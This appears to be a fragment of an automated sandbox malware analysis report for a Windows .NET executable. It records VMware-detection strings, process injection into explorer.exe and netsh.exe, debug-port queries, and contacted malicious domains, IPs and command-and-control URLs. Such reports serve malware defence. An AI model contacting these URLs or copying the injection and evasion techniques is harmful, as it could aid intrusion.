Source: explorer.exe, 00000005.00000000.367996285.000000000851A000.00000004.00000001.sdmp	Binary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\|\|w)
Source: explorer.exe, 00000005.00000000.367996285.000000000851A000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
Source: explorer.exe, 00000005.00000000.367328151.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.389305821.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000005.00000000.407240995.000000000D614000.00000004.00000001.sdmp	Binary or memory string: dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$w

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 3440	Jump to behavior

Source: explorer.exe, 00000005.00000000.362125482.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.367609334.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.404234223.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.381883157.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.396756364.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.358182276.00000000008B8000.00000004.00000020.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Windows Analysis Report cK1g5gckZR9VHjj.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Queries volume information: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
142.252.22.166	www.dragonmodz.net	United States	18779	EGIHOSTINGUS	true
154.94.210.101	www.qzttb.net	Seychelles	32708	ROOTNETWORKSUS	true
3.64.163.50	www.royaldears.com	United States	16509	AMAZON-02US	true
209.17.116.163	www.pittsburghdata.center	United States	55002	DEFENSE-NETUS	true

Name	Malicious	Antivirus Detection	Reputation
http://www.dragonmodz.net/udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd	true	Avira URL Cloud: safe	unknown
http://www.qzttb.net/udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd	true	Avira URL Cloud: safe	unknown
http://www.royaldears.com/udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd	true	Avira URL Cloud: safe	unknown
www.spoiledzone.com/udeh/	true	Avira URL Cloud: safe	low

ID:	528618
Product:	CloudBasic
Start time:	15:09:16
Start date:	25.11.2021
Sample:	cK1g5gckZR9VHjj.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	5f19b9a3e41ef2e6ec3200bf4a246cec
SHA1:	25638b49edf7444005e1e02fb5d972da5920e1d8
SHA256:	afac806262706aea36f8c34cb56ffa94f49da9b39b752cfd077f9b921e972c1d
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%